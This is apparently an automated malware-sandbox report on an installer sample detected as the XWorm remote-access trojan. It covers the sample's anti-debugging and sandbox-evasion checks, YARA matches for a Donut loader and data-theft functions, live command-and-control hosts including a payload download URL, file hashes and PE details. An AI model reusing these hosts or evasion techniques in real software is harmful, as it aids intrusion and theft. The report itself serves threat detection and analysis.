            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\33__Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\33__Installer.exeMemory allocated: 3D70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeMemory allocated: 4020000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeMemory allocated: 3E50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeWindow / User API: threadDelayed 2052Jump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeWindow / User API: threadDelayed 7787Jump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exe TID: 5920Thread sleep time: -23980767295822402s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exe TID: 5328Thread sleep count: 2052 > 30Jump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exe TID: 5328Thread sleep count: 7787 > 30Jump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 33__Installer.exe, 00000000.00000002.4105093119.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 33__Installer.exe, 00000000.00000002.4105093119.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, 33__Installer.exe, 00000000.00000002.4105093119.00000000014DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\33__Installer.exeAPI call chain: ExitProcess graph end nodegraph_0-25488
            Source: C:\Users\user\Desktop\33__Installer.exeAPI call chain: ExitProcess graph end nodegraph_0-25299
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C2AD72 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C2AD72
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C345F4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00C345F4
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_03CB1628 mov eax, dword ptr fs:[00000030h]0_2_03CB1628
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C37B91 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00C37B91
            Source: C:\Users\user\Desktop\33__Installer.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C2CD6D SetUnhandledExceptionFilter,0_2_00C2CD6D
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C2AD72 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C2AD72
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C26FE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C26FE1
            Source: C:\Users\user\Desktop\33__Installer.exeMemory allocated: page read and write | page guardJump to behavior
            Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-^q
            Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\^q@\^q'PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C21720 cpuid 0_2_00C21720
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,0_2_00C349CA
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00C34AA4
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00C2FAAD
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_00C2FBA2
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_00C2FCA4
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,0_2_00C2FC49
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: GetLocaleInfoA,0_2_00C34D69
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_00C2FE75
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_00C2FFD8
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00C2FF9C
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00C2FF35
            Source: C:\Users\user\Desktop\33__Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeCode function: 0_2_00C24CAA GetSystemTimeAsFileTime,__aulldiv,0_2_00C24CAA
            Source: C:\Users\user\Desktop\33__Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\33__Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0.2.33__Installer.exe.6160000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.33__Installer.exe.6160000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 33__Installer.exe PID: 6556, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0.2.33__Installer.exe.6160000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.33__Installer.exe.6160000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 33__Installer.exe PID: 6556, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Process Injection
            1
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory131
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media11
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared Drive2
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Process Injection
            NTDS131
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeylogging12
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information
            Cached Domain Credentials34
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            33__Installer.exe26%ReversingLabsWin32.Trojan.Generic
            33__Installer.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://guanlix.cn:881/330.ccp&(0%Avira URL Cloudsafe
            http://guanlix.cn:881/330.ccp0%Avira URL Cloudsafe
            117.41.184.330%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            guanlix.cn
            91.208.240.157
            truefalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              117.41.184.33true
              • Avira URL Cloud: safe
              unknown
              http://guanlix.cn:881/330.ccpfalse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name33__Installer.exe, 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://guanlix.cn:881/330.ccp&(33__Installer.exe, 00000000.00000002.4105093119.00000000014BE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              91.208.240.157
              guanlix.cnunknown
              139659LUCID-AS-APLUCIDACLOUDLIMITEDHKfalse
              117.41.184.33
              unknownChina
              134238CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCNtrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1466312
              Start date and time:2024-07-02 19:23:08 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 6m 42s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:5
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:33__Installer.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@1/2@1/2
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 27
              • Number of non-executed functions: 31
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: 33__Installer.exe
              TimeTypeDescription
              13:24:07API Interceptor7512367x Sleep call for process: 33__Installer.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              91.208.240.15731__Installer.exeGet hashmaliciousXWormBrowse
              • guanlix.cn:881/31.ccp
              103-o_Installer.exeGet hashmaliciousXWormBrowse
              • guanlix.cn:881/103.ccp
              31-o_Installer.exeGet hashmaliciousXWormBrowse
              • guanlix.cn:881/31.ccp
              33-o_Installer.exeGet hashmaliciousXWormBrowse
              • guanlix.cn:881/33.ccp
              117.41.184.3333-o_Installer.exeGet hashmaliciousXWormBrowse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                guanlix.cn31__Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                103-o_Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                31-o_Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                33-o_Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN33-o_Installer.exeGet hashmaliciousXWormBrowse
                • 117.41.184.33
                https://seoauthoritybook.com/Get hashmaliciousUnknownBrowse
                • 106.225.194.35
                skt.m68k.elfGet hashmaliciousMiraiBrowse
                • 59.63.219.186
                #U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.docGet hashmaliciousUnknownBrowse
                • 59.63.226.86
                2024#U5e74#U4e8c#U5b63#U5ea6#U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.docGet hashmaliciousUnknownBrowse
                • 59.63.226.86
                SecuriteInfo.com.Trojan.Siggen22.58997.11289.5716.exeGet hashmaliciousPoisonivyBrowse
                • 106.225.194.35
                2024#U5e74#U4e00#U5b63#U5ea6#U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.docGet hashmaliciousUnknownBrowse
                • 59.63.226.86
                2024#U5e74#U4e00#U5b63#U5ea6#U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.docGet hashmaliciousUnknownBrowse
                • 59.63.226.86
                pKO4Qel23K.elfGet hashmaliciousMiraiBrowse
                • 59.63.167.214
                JKfLgrv17o.elfGet hashmaliciousMiraiBrowse
                • 59.63.219.189
                LUCID-AS-APLUCIDACLOUDLIMITEDHK31__Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                103-o_Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                31-o_Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                33-o_Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                https://telegram-wv.icu/Get hashmaliciousUnknownBrowse
                • 103.143.81.212
                #U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exeGet hashmaliciousUnknownBrowse
                • 45.136.13.176
                #U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exeGet hashmaliciousUnknownBrowse
                • 45.136.13.176
                CXM5Rc4W2k.exeGet hashmaliciousGhostRatBrowse
                • 103.143.81.180
                CXM5Rc4W2k.exeGet hashmaliciousGhostRatBrowse
                • 103.143.81.180
                dllhostpgd.exeGet hashmaliciousCobaltStrikeBrowse
                • 45.136.14.159
                No context
                No context
                Process:C:\Users\user\Desktop\33__Installer.exe
                File Type:data
                Category:dropped
                Size (bytes):71938
                Entropy (8bit):7.604676564541333
                Encrypted:false
                SSDEEP:1536:u7rl7/dDEWTG0KHvpLhkUsYywwI6aM6eKXBwLsy1ETqfvu+P4Rtsj5o:enTG0KBLfsYywwTaMRKXBwLs/
                MD5:1BEA636EC9B170D6306D6082552DD002
                SHA1:920644E8AA039A829A58C4EF7065B61208795605
                SHA-256:D90BF4D25240AA036B21D8FDF1F1F3F55CD03C61EAB7F941624F96D3C70AACFC
                SHA-512:DCCDE5A72EF3203CD68AE6497B9D9D5322387F7196F66C1042D16F3F54AB12A6955CBD1E286477089C601041208E8F017D5BDFB003CDBD377054BC975D2139D7
                Malicious:false
                Yara Hits:
                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\Public\Downloads\ind.jpg, Author: unknown
                Reputation:low
                Preview:.......Xm.0N~.2.oi...../:..#E......5.....r..V...Q.Z.....x...G.......2.....|'......B.u...\...d#..>.....H..n'...H4n...W.......k..>...W4......w..J...Z..$@.../....M?..=o...'.z.....$....%....Y..".).|.?.Q.:u.]l....L.GP.f.../L.izV..n.Hv...{.Ua.x..BV.OS....|.$;..@a`.._........}....k....M..'(.............................................................................................................................................................................................................................................................(j...Y....Y.2..I..PZ.P..k<.AT...HYZ.Ip3.7...\..<.m`.......w...(.gw..!.).@{...3....h".l....=.jz.Z^T.V.k^[W...J....\s.>...W.y....N..n..."..j....X....B....d.Z.....L..x. ...{.J1_.\.........<p.N......oND..?=./N.r.*..X<..8.....:P..H.M......Ot.^....|".X...E...?...i....I'.g...]Ek.....(..E]..F.,..A}..?...t.Q. }5l....\TT...$......N.....fHP9.#3.qKo.x...~..k.k...hN;.........<_.r.m{.o..R.p?..-..E......k.......aj`.=..d..2
                Process:C:\Users\user\Desktop\33__Installer.exe
                File Type:data
                Category:dropped
                Size (bytes):71938
                Entropy (8bit):7.604676564541333
                Encrypted:false
                SSDEEP:1536:u7rl7/dDEWTG0KHvpLhkUsYywwI6aM6eKXBwLsy1ETqfvu+P4Rtsj5o:enTG0KBLfsYywwTaMRKXBwLs/
                MD5:1BEA636EC9B170D6306D6082552DD002
                SHA1:920644E8AA039A829A58C4EF7065B61208795605
                SHA-256:D90BF4D25240AA036B21D8FDF1F1F3F55CD03C61EAB7F941624F96D3C70AACFC
                SHA-512:DCCDE5A72EF3203CD68AE6497B9D9D5322387F7196F66C1042D16F3F54AB12A6955CBD1E286477089C601041208E8F017D5BDFB003CDBD377054BC975D2139D7
                Malicious:false
                Yara Hits:
                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccp, Author: unknown
                Reputation:low
                Preview:.......Xm.0N~.2.oi...../:..#E......5.....r..V...Q.Z.....x...G.......2.....|'......B.u...\...d#..>.....H..n'...H4n...W.......k..>...W4......w..J...Z..$@.../....M?..=o...'.z.....$....%....Y..".).|.?.Q.:u.]l....L.GP.f.../L.izV..n.Hv...{.Ua.x..BV.OS....|.$;..@a`.._........}....k....M..'(.............................................................................................................................................................................................................................................................(j...Y....Y.2..I..PZ.P..k<.AT...HYZ.Ip3.7...\..<.m`.......w...(.gw..!.).@{...3....h".l....=.jz.Z^T.V.k^[W...J....\s.>...W.y....N..n..."..j....X....B....d.Z.....L..x. ...{.J1_.\.........<p.N......oND..?=./N.r.*..X<..8.....:P..H.M......Ot.^....|".X...E...?...i....I'.g...]Ek.....(..E]..F.,..A}..?...t.Q. }5l....\TT...$......N.....fHP9.#3.qKo.x...~..k.k...hN;.........<_.r.m{.o..R.p?..-..E......k.......aj`.=..d..2
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):5.9386097015607895
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:33__Installer.exe
                File size:247'808 bytes
                MD5:8182ed62008e7526ae7e1f7d702fbcb6
                SHA1:3a3808eefd17f32bc074c739586b6b36c0a06c15
                SHA256:a862efea745fd2c39b097d2e1e1d6961ba4d6f8e5c2823d345c5035b95d44f69
                SHA512:913e79b2613236be7e805dd2c22aceef5fbe9cf408534968aa4ae8dc939dc3eb8a9ee7ba9eb8369d3fed97e6313d0e1183849f9ab7bb84f0e9529064a2b6731b
                SSDEEP:3072:jSg5JZaegxuSS7JY459BaybX1xirH7sO4ZQeAnuTCt2xbzmyoaq6rcYsc8kOeAVS:jt5JPgxcqAKcXWrbNnjZ2x
                TLSH:54344B91F690D4B5D81701B5983ACEB2126BBE798A74018B36D4372F5EB73C31936E0B
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{b..{b..{b......ob....<..b..r...|b..{b..!b....=.Ob......zb......zb..Rich{b..........PE..L....d.f.................v...N.....
                Icon Hash:20246c0c56e20926
                Entrypoint:0x406551
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Time Stamp:0x668364B9 [Tue Jul 2 02:23:53 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:0b47c746b58dc722dcec07246158fda2
                Instruction
                call 00007F8DD44F0E05h
                jmp 00007F8DD44E9C9Eh
                mov edi, edi
                push ebp
                mov ebp, esp
                mov eax, dword ptr [ebp+08h]
                test eax, eax
                je 00007F8DD44E9E24h
                sub eax, 08h
                cmp dword ptr [eax], 0000DDDDh
                jne 00007F8DD44E9E19h
                push eax
                call 00007F8DD44E8719h
                pop ecx
                pop ebp
                ret
                mov edi, edi
                push ebp
                mov ebp, esp
                mov eax, dword ptr [ebp+08h]
                push esi
                mov esi, ecx
                mov byte ptr [esi+0Ch], 00000000h
                test eax, eax
                jne 00007F8DD44E9E75h
                call 00007F8DD44ED672h
                mov dword ptr [esi+08h], eax
                mov ecx, dword ptr [eax+6Ch]
                mov dword ptr [esi], ecx
                mov ecx, dword ptr [eax+68h]
                mov dword ptr [esi+04h], ecx
                mov ecx, dword ptr [esi]
                cmp ecx, dword ptr [0041F1E8h]
                je 00007F8DD44E9E24h
                mov ecx, dword ptr [0041EFA0h]
                test dword ptr [eax+70h], ecx
                jne 00007F8DD44E9E19h
                call 00007F8DD44F17DFh
                mov dword ptr [esi], eax
                mov eax, dword ptr [esi+04h]
                cmp eax, dword ptr [0041EEA8h]
                je 00007F8DD44E9E28h
                mov eax, dword ptr [esi+08h]
                mov ecx, dword ptr [0041EFA0h]
                test dword ptr [eax+70h], ecx
                jne 00007F8DD44E9E1Ah
                call 00007F8DD44F103Eh
                mov dword ptr [esi+04h], eax
                mov eax, dword ptr [esi+08h]
                test byte ptr [eax+70h], 00000002h
                jne 00007F8DD44E9E26h
                or dword ptr [eax+70h], 02h
                mov byte ptr [esi+0Ch], 00000001h
                jmp 00007F8DD44E9E1Ch
                mov ecx, dword ptr [eax]
                mov dword ptr [esi], ecx
                mov eax, dword ptr [eax+04h]
                mov dword ptr [esi+04h], eax
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                mov edi, edi
                push ebp
                mov ebp, esp
                sub esp, 10h
                mov eax, dword ptr [0041E910h]
                xor eax, ebp
                mov dword ptr [ebp-04h], eax
                mov edx, dword ptr [ebp+18h]
                push ebx
                Programming Language:
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [IMP] VS2008 SP1 build 30729
                • [C++] VS2010 build 30319
                • [RES] VS2010 build 30319
                • [LNK] VS2010 build 30319
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x1d7ec0x3c.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x1c748.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3f0000x1324.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1c2100x40.rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x190000x150.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x1743c0x17600ab580cddc679ae0d5b3dd834986610c2False0.5719522894385026data6.614276586524876IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x190000x4f700x50008e5c6b4b12873e8ba6fbdd1a148d008cFalse0.359716796875data4.948589515734893IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x1e0000x36a40x1800500b8464eb3f810675db40ab228e1c8dFalse0.318359375data3.965821344741006IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x220000x1c7480x1c800a54431f5671b576c9accbe2dc593520cFalse0.27455969024122806data4.800983647652764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
